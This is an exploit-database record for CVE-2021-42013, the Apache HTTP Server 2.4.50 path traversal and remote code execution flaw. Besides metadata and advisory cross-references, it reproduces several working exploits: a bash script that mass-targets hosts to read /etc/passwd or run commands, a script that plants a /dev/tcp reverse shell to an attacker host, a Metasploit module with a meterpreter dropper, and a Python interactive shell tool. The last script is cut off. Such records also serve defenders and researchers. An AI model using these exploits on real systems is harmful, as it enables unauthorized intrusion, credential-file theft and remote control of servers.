DATABASE RESOURCES PRICING ABOUT US

{"id": "EDB-ID:50406", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE)", "description": "", "published": "2021-10-13T00:00:00", "modified": "2021-10-13T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.exploit-db.com/exploits/50406", "reporter": "Lucas Souza", "references": [], "cvelist": ["2021-42013", "CVE-2021-42013"], "immutableFields": [], "lastseen": "2022-08-16T06:04:01", "viewCount": 985, "enchantments": {"dependencies": {"references": [{"type": "amazon", "idList": ["ALAS-2021-1543", "ALAS2-2021-1716"]}, {"type": "archlinux", "idList": ["ASA-202110-1"]}, {"type": "attackerkb", "idList": ["AKB:4BB9D3C7-37EF-4B65-B2A8-550AFC30664C", "AKB:61971866-F0B5-4317-8AF4-C4E4C23279F1", "AKB:BD8195D2-FB3B-4F9B-82C5-32F5CBDEFF70"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0749"]}, {"type": "cisa", "idList": ["CISA:76FE595B1B89D06301E16CB8087D39BD", "CISA:78B08801DAA7C3B8A2D34A5790730C76"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2021-41773", "CISA-KEV-CVE-2021-42013"]}, {"type": "cisco", "idList": ["CISCO-SA-APACHE-HTTPD-PATHTRV-LAZG68CZ"]}, {"type": "cve", "idList": ["CVE-2021-41773", "CVE-2021-42013"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-41773", "DEBIANCVE:CVE-2021-42013"]}, {"type": "dsquare", "idList": ["E-738", "E-739"]}, {"type": "exploitdb", "idList": ["EDB-ID:50446", "EDB-ID:50512"]}, {"type": "f5", "idList": ["F5:K04082144"]}, {"type": "fedora", "idList": ["FEDORA:00C4C3098596", "FEDORA:BDD0730B86DF"]}, {"type": "freebsd", "idList": ["D001C189-2793-11EC-8FB1-206A8A720317"]}, {"type": "gentoo", "idList": ["GLSA-202208-20"]}, {"type": "githubexploit", "idList": ["0C28A0EC-7162-5D73-BEC9-B034F5392847", "0C47BCF2-EA6F-5613-A6E8-B707D64155DE", "11813536-2AFF-5EA4-B09F-E9EB340DDD26", "1C39E10A-4A38-5228-8334-2A5F8AAB7FC3", "22DCCD26-B68C-5905-BAC2-71D10DE3F123", "2A177215-CE4A-5FA7-B016-EEAF332D165C", "4051D2EF-1C43-576D-ADB2-B519B31F93A0", "44E43BB7-6255-58E7-99C7-C3B84645D497", "495E99E5-C1B0-52C1-9218-384D04161BE4", "52E13088-9643-5E81-B0A0-B7478BCF1F2C", "5312D04F-9490-5472-84FA-86B3BBDC8928", "61075B23-F713-537A-9B84-7EB9B96CF228", "68A13FF0-60E5-5A29-9248-83A940B0FB02", "6A0A657E-8300-5312-99CE-E11F460B1DBF", "6BCBA83C-4A4C-58D7-92E4-DF092DFEF267", "6CAA7558-723B-5286-9840-4DF4EB48E0AF", "78787F63-0356-51EC-B32A-B9BD114431C3", "805E6B24-8DF9-51D8-8DF6-6658161F96EA", "86360765-0B1A-5D73-A805-BAE8F1B5D16D", "8713FD59-264B-5FD7-8429-3251AB5AB3B8", "88EB009A-EEFF-52B7-811D-A8A8C8DE8C81", "8A57FAF6-FC91-52D1-84E0-4CBBAD3F9677", "A2D97DCC-04C2-5CB1-921F-709AA8D7FD9A", "A3F15BCE-08AD-509D-AE63-9D3D8E402E0B", "A8616E5E-04F8-56D8-ACB4-32FDF7F66EED", "B81BC21D-818E-5B33-96D7-062C14102874", "BF9B0898-784E-5B5E-9505-430B58C1E6B8", "C879EE66-6B75-5EC8-AA68-08693C6CCAD1", "D0368327-F989-5557-A5C6-0D9ACDB4E72F", "E59A01BE-8176-5F5E-BD32-D30B009CDBDA", "E81474F6-6DDC-5FC2-828A-812A8815E3B4", "F41EE867-4E63-5259-9DF0-745881884D04", "F8A7DE57-8F14-5B3C-A102-D546BDD8D2B8", "FF2EF58E-53AA-5B60-9EA1-4B5C29647395"]}, {"type": "hackerone", "idList": ["H1:1394916", "H1:1400238", "H1:1404731"]}, {"type": "httpd", "idList": ["HTTPD:E1C40920F9DFC60284EEE7539DA30483"]}, {"type": "ibm", "idList": ["B0C070EA4747AEFBB7DD852AD2FEB1C85461D6FC3CC95192FD2B7703C8D3DCB2"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:FEBE35B3CF79AFD5E057AF4D43E9C08F"]}, {"type": "jvn", "idList": ["JVN:51106450"]}, {"type": "mageia", "idList": ["MGASA-2021-0470"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:916ADA06F0F0B2E4CCBAE56C7FEA87D1"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH-", "MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE-"]}, {"type": "nessus", "idList": ["AL2_ALAS-2021-1716.NASL", "ALA_ALAS-2021-1543.NASL", "APACHE_2_4_50_PATH_TRAVERSAL.NBIN", "APACHE_2_4_51.NASL", "FREEBSD_PKG_D001C189279311EC8FB1206A8A720317.NASL", "GENTOO_GLSA-202208-20.NASL", "WEB_APPLICATION_SCANNING_113015"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2022", "ORACLE:CPUJAN2022"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164501", "PACKETSTORM:164609", "PACKETSTORM:164629", "PACKETSTORM:164941"]}, {"type": "photon", "idList": ["PHSA-2021-0118"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:78A056D339E07378EFC349E5ACA8EC30", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:8C1A6CAF7B07CD1A38A8D65351756A2F", "RAPID7BLOG:9C7E6BE350F06790928CFF68E04A6ECE"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-42013"]}, {"type": "slackware", "idList": ["SSA-2021-280-01"]}, {"type": "thn", "idList": ["THN:A0816B13A402B9865C624E3CA1B06EA5"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-41773", "UB:CVE-2021-42013"]}, {"type": "veracode", "idList": ["VERACODE:32442"]}, {"type": "zdt", "idList": ["1337DAY-ID-36897", "1337DAY-ID-36937", "1337DAY-ID-36952", "1337DAY-ID-37030", "1337DAY-ID-37777"]}]}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS-2021-1543", "ALAS2-2021-1716"]}, {"type": "archlinux", "idList": ["ASA-202110-1"]}, {"type": "attackerkb", "idList": ["AKB:4BB9D3C7-37EF-4B65-B2A8-550AFC30664C", "AKB:BD8195D2-FB3B-4F9B-82C5-32F5CBDEFF70"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0749"]}, {"type": "cisa", "idList": ["CISA:76FE595B1B89D06301E16CB8087D39BD", "CISA:78B08801DAA7C3B8A2D34A5790730C76"]}, {"type": "cisco", "idList": ["CISCO-SA-APACHE-HTTPD-PATHTRV-LAZG68CZ"]}, {"type": "cve", "idList": ["CVE-2020-25004", "CVE-2021-42013"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-42013"]}, {"type": "dsquare", "idList": ["E-738", "E-739"]}, {"type": "exploitdb", "idList": ["EDB-ID:50446", "EDB-ID:50512"]}, {"type": "f5", "idList": ["F5:K04082144"]}, {"type": "fedora", "idList": ["FEDORA:00C4C3098596", "FEDORA:BDD0730B86DF"]}, {"type": "freebsd", "idList": ["D001C189-2793-11EC-8FB1-206A8A720317"]}, {"type": "githubexploit", "idList": ["0C28A0EC-7162-5D73-BEC9-B034F5392847", "11813536-2AFF-5EA4-B09F-E9EB340DDD26", "1C39E10A-4A38-5228-8334-2A5F8AAB7FC3", "22DCCD26-B68C-5905-BAC2-71D10DE3F123", "2A177215-CE4A-5FA7-B016-EEAF332D165C", "44E43BB7-6255-58E7-99C7-C3B84645D497", "52E13088-9643-5E81-B0A0-B7478BCF1F2C", "5312D04F-9490-5472-84FA-86B3BBDC8928", "68A13FF0-60E5-5A29-9248-83A940B0FB02", "6BCBA83C-4A4C-58D7-92E4-DF092DFEF267", "805E6B24-8DF9-51D8-8DF6-6658161F96EA", "8713FD59-264B-5FD7-8429-3251AB5AB3B8", "88EB009A-EEFF-52B7-811D-A8A8C8DE8C81", "8A57FAF6-FC91-52D1-84E0-4CBBAD3F9677", "A2D97DCC-04C2-5CB1-921F-709AA8D7FD9A", "A3F15BCE-08AD-509D-AE63-9D3D8E402E0B", "B81BC21D-818E-5B33-96D7-062C14102874", "BF9B0898-784E-5B5E-9505-430B58C1E6B8", "D0368327-F989-5557-A5C6-0D9ACDB4E72F", "E59A01BE-8176-5F5E-BD32-D30B009CDBDA", "F41EE867-4E63-5259-9DF0-745881884D04", "F8A7DE57-8F14-5B3C-A102-D546BDD8D2B8"]}, {"type": "hackerone", "idList": ["H1:1394916", "H1:1400238", "H1:1404731"]}, {"type": "httpd", "idList": ["HTTPD:E1C40920F9DFC60284EEE7539DA30483"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:FEBE35B3CF79AFD5E057AF4D43E9C08F"]}, {"type": "jvn", "idList": ["JVN:51106450"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:916ADA06F0F0B2E4CCBAE56C7FEA87D1"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/APACHE_NORMALIZE_PATH/", "MSF:EXPLOIT/MULTI/HTTP/APACHE_NORMALIZE_PATH_RCE/"]}, {"type": "nessus", "idList": ["AL2_ALAS-2021-1716.NASL", "ALA_ALAS-2021-1543.NASL", "APACHE_2_4_50_PATH_TRAVERSAL.NBIN", "APACHE_2_4_51.NASL", "FREEBSD_PKG_D001C189279311EC8FB1206A8A720317.NASL", "WEB_APPLICATION_SCANNING_113015"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2022"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164501", "PACKETSTORM:164609", "PACKETSTORM:164629", "PACKETSTORM:164941"]}, {"type": "photon", "idList": ["PHSA-2021-0118"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:78A056D339E07378EFC349E5ACA8EC30", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:8C1A6CAF7B07CD1A38A8D65351756A2F", "RAPID7BLOG:9C7E6BE350F06790928CFF68E04A6ECE"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-42013"]}, {"type": "slackware", "idList": ["SSA-2021-280-01"]}, {"type": "thn", "idList": ["THN:A0816B13A402B9865C624E3CA1B06EA5"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-42013"]}, {"type": "zdt", "idList": ["1337DAY-ID-36897", "1337DAY-ID-36937", "1337DAY-ID-36952", "1337DAY-ID-37030"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-42013", "epss": "0.975580000", "percentile": "0.999920000", "modified": "2023-03-17"}], "vulnersScore": 0.2}, "_state": {"dependencies": 1661190686, "score": 1661191103, "epss": 1679134186}, "_internal": {"score_hash": "3c1537c360c45d6bc1afeeeeea4c490d"}, "sourceHref": "https://www.exploit-db.com/download/50406", "sourceData": "# Exploit: Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE)\r\n# Date: 10/05/2021\r\n# Exploit Author: Lucas Souza https://lsass.io\r\n# Vendor Homepage: https://apache.org/\r\n# Version: 2.4.50\r\n# Tested on: 2.4.50\r\n# CVE : CVE-2021-42013\r\n# Credits: Ash Daulton and the cPanel Security Team\r\n\r\n#!/bin/bash\r\n\r\nif [[ $1 == '' ]]; [[ $2 == '' ]]; then\r\necho Set [TAGET-LIST.TXT] [PATH] [COMMAND]\r\necho ./PoC.sh targets.txt /etc/passwd\r\necho ./PoC.sh targets.txt /bin/sh id\r\n\r\nexit\r\nfi\r\nfor host in $(cat $1); do\r\necho $host\r\ncurl -s --path-as-is -d \"echo Content-Type: text/plain; echo; $3\" \"$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2\"; done\r\n\r\n# PoC.sh targets.txt /etc/passwd\r\n# PoC.sh targets.txt /bin/sh whoami", "osvdbidlist": [], "exploitType": "webapps", "verified": true}

{"packetstorm": [{"lastseen": "2021-10-13T15:48:46", "description": "", "cvss3": {}, "published": "2021-10-13T00:00:00", "type": "packetstorm", "title": "Apache HTTP Server 2.4.50 Path Traversal / Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-42013"], "modified": "2021-10-13T00:00:00", "id": "PACKETSTORM:164501", "href": "https://packetstormsecurity.com/files/164501/Apache-HTTP-Server-2.4.50-Path-Traversal-Code-Execution.html", "sourceData": "`# Exploit: Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE) \n# Date: 10/05/2021 \n# Exploit Author: Lucas Souza https://lsass.io \n# Vendor Homepage: https://apache.org/ \n# Version: 2.4.50 \n# Tested on: 2.4.50 \n# CVE : CVE-2021-42013 \n# Credits: Ash Daulton and the cPanel Security Team \n \n#!/bin/bash \n \nif [[ $1 == '' ]]; [[ $2 == '' ]]; then \necho Set [TAGET-LIST.TXT] [PATH] [COMMAND] \necho ./PoC.sh targets.txt /etc/passwd \necho ./PoC.sh targets.txt /bin/sh id \n \nexit \nfi \nfor host in $(cat $1); do \necho $host \ncurl -s --path-as-is -d \"echo Content-Type: text/plain; echo; $3\" \"$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2\"; done \n \n# PoC.sh targets.txt /etc/passwd \n# PoC.sh targets.txt /bin/sh whoami \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/164501/apache2450-traversalexec.txt"}, {"lastseen": "2021-10-25T17:32:30", "description": "", "cvss3": {}, "published": "2021-10-24T00:00:00", "type": "packetstorm", "title": "Apache HTTP Server 2.4.50 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-42013"], "modified": "2021-10-24T00:00:00", "id": "PACKETSTORM:164609", "href": "https://packetstormsecurity.com/files/164609/Apache-HTTP-Server-2.4.50-Remote-Code-Execution.html", "sourceData": "`# Exploit: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2) \n# Credits: Ash Daulton & cPanel Security Team \n# Date: 24/07/2021 \n# Exploit Author: TheLastVvV.com \n# Vendor Homepage: https://apache.org/ \n# Version: Apache 2.4.50 with CGI enable \n# Tested on : Debian 5.10.28 \n# CVE : CVE-2021-42013 \n \n#!/bin/bash \n \necho 'PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI' \nif [ $# -eq 0 ] \nthen \necho \"try: ./$0 http://ip:port LHOST LPORT\" \nexit 1 \nfi \ncurl \"$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh\" -d \"echo Content-Type: text/plain; echo; echo '/bin/sh -i >& /dev/tcp/$2/$3 0>&1' > /tmp/revoshell.sh\" && curl \"$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh\" -d \"echo Content-Type: text/plain; echo; bash /tmp/revoshell.sh\" \n \n#usage chmod -x CVE-2021-42013.sh \n#./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/164609/apache2450-exec.txt"}, {"lastseen": "2021-10-25T17:32:29", "description": "", "cvss3": {}, "published": "2021-10-25T00:00:00", "type": "packetstorm", "title": "Apache 2.4.49 / 2.4.50 Traversal / Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-25T00:00:00", "id": "PACKETSTORM:164629", "href": "https://packetstormsecurity.com/files/164629/Apache-2.4.49-2.4.50-Traversal-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::Remote::CheckModule \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Apache 2.4.49/2.4.50 Traversal RCE', \n'Description' => %q{ \nThis module exploit an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773). \nIf files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled, \nit can be used to execute arbitrary commands (Remote Command Execution). \nThis vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013). \n}, \n'References' => [ \n['CVE', '2021-41773'], \n['CVE', '2021-42013'], \n['URL', 'https://httpd.apache.org/security/vulnerabilities_24.html'], \n['URL', 'https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse'], \n['URL', 'https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/apache/apache-httpd-rce.yaml'], \n['URL', 'https://github.com/projectdiscovery/nuclei-templates/commit/9384dd235ec5107f423d930ac80055f2ce2bff74'], \n['URL', 'https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis'] \n], \n'Author' => [ \n'Ash Daulton', # Vulnerability discovery \n'Dhiraj Mishra', # Metasploit auxiliary module \n'mekhalleh (RAMELLA S\u00e9bastien)' # Metasploit exploit module (Zeop Entreprise) \n], \n'DisclosureDate' => '2021-05-10', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86], \n'DefaultOptions' => { \n'CheckModule' => 'auxiliary/scanner/http/apache_normalize_path', \n'Action' => 'CHECK_RCE', \n'RPORT' => 443, \n'SSL' => true \n}, \n'Targets' => [ \n[ \n'Automatic (Dropper)', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X64, ARCH_X86], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', \n'DisablePayloadHandler' => 'false' \n} \n} \n], \n[ \n'Unix Command (In-Memory)', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_command, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/generic', \n'DisablePayloadHandler' => 'true' \n} \n} \n], \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2021-42013', ['CVE-2021-41773', 'CVE-2021-42013']]), \nOptInt.new('DEPTH', [true, 'Depth for Path Traversal', 5]), \nOptString.new('TARGETURI', [true, 'Base path', '/cgi-bin']) \n]) \nend \n \ndef cmd_unix_generic? \ndatastore['PAYLOAD'] == 'cmd/unix/generic' \nend \n \ndef execute_command(command, _opts = {}) \ntraversal = pick_payload * datastore['DEPTH'] << '/bin/sh' \n \nuri = normalize_uri(datastore['TARGETURI'], traversal.to_s) \nresponse = send_request_raw({ \n'method' => Rex::Text.rand_text_alpha(3..4), \n'uri' => uri, \n'data' => \"#{Rex::Text.rand_text_alpha(1..3)}=|echo;#{command}\" \n}) \nif response && response.body \nreturn response.body \nend \n \nfalse \nend \n \ndef message(msg) \n\"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\" \nend \n \ndef pick_payload \ncase datastore['CVE'] \nwhen 'CVE-2021-41773' \npayload = '.%2e/' \nwhen 'CVE-2021-42013' \npayload = '.%%32%65/' \nelse \npayload = '' \nend \n \npayload \nend \n \ndef exploit \n@proto = (ssl ? 'https' : 'http') \n \nif (!check.eql? Exploit::CheckCode::Vulnerable) && !datastore['ForceExploit'] \nfail_with(Failure::NotVulnerable, 'The target is not exploitable.') \nend \n \nprint_status(message(\"Attempt to exploit for #{datastore['CVE']}\")) \ncase target['Type'] \nwhen :linux_dropper \n \nfile_name = \"/tmp/#{Rex::Text.rand_text_alpha(4..8)}\" \ncmd = \"echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name}; rm -f #{file_name}\" \n \nprint_status(message(\"Sending #{datastore['PAYLOAD']} command payload\")) \nvprint_status(message(\"Generated command payload: #{cmd}\")) \n \nexecute_command(cmd) \n \nregister_file_for_cleanup file_name \nwhen :unix_command \nvprint_status(message(\"Generated payload: #{payload.encoded}\")) \n \nif !cmd_unix_generic? \nexecute_command(payload.encoded) \nelse \nreceived = execute_command(payload.encoded.to_s) \n \nprint_warning(message('Dumping command output in response')) \nif !received \nprint_error(message('Empty response, no command output')) \n \nreturn \nend \nprint_line(received) \nend \nend \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/164629/apache_normalize_path_rce.rb.txt"}, {"lastseen": "2021-11-11T17:16:30", "description": "", "cvss3": {}, "published": "2021-11-11T00:00:00", "type": "packetstorm", "title": "Apache HTTP Server 2.4.50 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-11T00:00:00", "id": "PACKETSTORM:164941", "href": "https://packetstormsecurity.com/files/164941/Apache-HTTP-Server-2.4.50-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3) \n# Date: 11/11/2021 \n# Exploit Author: Valentin Lobstein \n# Vendor Homepage: https://apache.org/ \n# Software Link: https://github.com/Balgogan/CVE-2021-41773 \n# Version: Apache 2.4.49/2.4.50 (CGI enabled) \n# Tested on: Debian GNU/Linux \n# CVE : CVE-2021-41773 / CVE-2021-42013 \n# Credits : Lucas Schnell \n \n \n#!/usr/bin/env python3 \n#coding: utf-8 \n \nimport os \nimport re \nimport sys \nimport time \nimport requests \nfrom colorama import Fore,Style \n \n \nheader = '''\\033[1;91m \n \n\u2584\u2584\u2584 \u2588\u2588\u2593\u2588\u2588\u2588 \u2584\u2584\u2584 \u2584\u2588\u2588\u2588\u2588\u2584 \u2588\u2588\u2591 \u2588\u2588 \u2593\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2580\u2588\u2588\u2588 \u2584\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2588\u2588\u2588 \n\u2592\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2591 \u2588\u2588\u2592\u2592\u2588\u2588\u2588\u2588\u2584 \u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588\u2588\u2591 \u2588\u2588\u2592\u2593\u2588 \u2580 \u2593\u2588\u2588 \u2592 \u2588\u2588\u2592\u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588 \u2580 \n\u2592\u2588\u2588 \u2580\u2588\u2584 \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592\u2592\u2588\u2588 \u2580\u2588\u2584 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2588\u2591\u2592\u2588\u2588\u2588 \u2593\u2588\u2588 \u2591\u2584\u2588 \u2592\u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2588 \n\u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592\u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2591\u2593\u2588 \u2591\u2588\u2588 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2584 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2592\u2593\u2588 \u2584 \n\u2593\u2588 \u2593\u2588\u2588\u2592\u2592\u2588\u2588\u2592 \u2591 \u2591 \u2593\u2588 \u2593\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2593\u2588\u2592\u2591\u2588\u2588\u2593\u2591\u2592\u2588\u2588\u2588\u2588\u2592 \u2591\u2588\u2588\u2593 \u2592\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2592\u2588\u2588\u2588\u2588\u2592 \n\u2592\u2592 \u2593\u2592\u2588\u2591\u2592\u2593\u2592\u2591 \u2591 \u2591 \u2592\u2592 \u2593\u2592\u2588\u2591\u2591 \u2591\u2592 \u2592 \u2591 \u2592 \u2591\u2591\u2592\u2591\u2592\u2591\u2591 \u2592\u2591 \u2591 \u2591 \u2592\u2593 \u2591\u2592\u2593\u2591\u2591 \u2591\u2592 \u2592 \u2591\u2591\u2591 \u2592\u2591 \u2591 \n\u2592 \u2592\u2592 \u2591\u2591\u2592 \u2591 \u2592 \u2592\u2592 \u2591 \u2591 \u2592 \u2592 \u2591\u2592\u2591 \u2591 \u2591 \u2591 \u2591 \u2591\u2592 \u2591 \u2592\u2591 \u2591 \u2592 \u2591 \u2591 \u2591 \n\u2591 \u2592 \u2591\u2591 \u2591 \u2592 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 \u2591 \n''' + Style.RESET_ALL \n \n \nif len(sys.argv) < 2 : \nprint( 'Use: python3 file.py ip:port ' ) \nsys.exit() \n \ndef end(): \nprint(\"\\t\\033[1;91m[!] Bye bye !\") \ntime.sleep(0.5) \nsys.exit(1) \n \ndef commands(url,command,session): \ndirectory = mute_command(url,'pwd') \nuser = mute_command(url,'whoami') \nhostname = mute_command(url,'hostname') \nadvise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\\'t an interactive shell)') \ncommand = input(f\"{Fore.RED}\u256d\u2500{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\\n{Fore.RED}\u2570\u2500{Fore.YELLOW}$ {Style.RESET_ALL}\") \ncommand = f\"echo; {command};\" \nreq = requests.Request('POST', url=url, data=command) \nprepare = req.prepare() \nprepare.url = url \nresponse = session.send(prepare, timeout=5) \noutput = response.text \nprint(output) \nif 'clear' in command: \nos.system('/usr/bin/clear') \nprint(header) \nif 'exit' in command: \nend() \n \ndef mute_command(url,command): \nsession = requests.Session() \nreq = requests.Request('POST', url=url, data=f\"echo; {command}\") \nprepare = req.prepare() \nprepare.url = url \nresponse = session.send(prepare, timeout=5) \nreturn response.text.strip() \n \n \ndef exploitRCE(payload): \ns = requests.Session() \ntry: \nhost = sys.argv[1] \nif 'http' not in host: \nurl = 'http://'+ host + payload \nelse: \nurl = host + payload \nsession = requests.Session() \ncommand = \"echo; id\" \nreq = requests.Request('POST', url=url, data=command) \nprepare = req.prepare() \nprepare.url = url \nresponse = session.send(prepare, timeout=5) \noutput = response.text \nif \"uid\" in output: \nchoice = \"Y\" \nprint( Fore.GREEN + '\\n[!] Target %s is vulnerable !!!' % host) \nprint(\"[!] Sortie:\\n\\n\" + Fore.YELLOW + output ) \nchoice = input(Fore.CYAN + \"[?] Do you want to exploit this RCE ? (Y/n) : \") \nif choice.lower() in ['','y','yes']: \nwhile True: \ncommands(url,command,session) \nelse: \nend() \nelse : \nprint(Fore.RED + '\\nTarget %s isn\\'t vulnerable' % host) \nexcept KeyboardInterrupt: \nend() \n \ndef main(): \ntry: \napache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash' \napache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash' \npayloads = [apache2449_payload,apache2450_payload] \nchoice = len(payloads) + 1 \nprint(header) \nprint(\"\\033[1;37m[0] Apache 2.4.49 RCE\\n[1] Apache 2.4.50 RCE\") \nwhile choice >= len(payloads) and choice >= 0: \nchoice = int(input('[~] Choice : ')) \nif choice < len(payloads): \nexploitRCE(payloads[choice]) \nexcept KeyboardInterrupt: 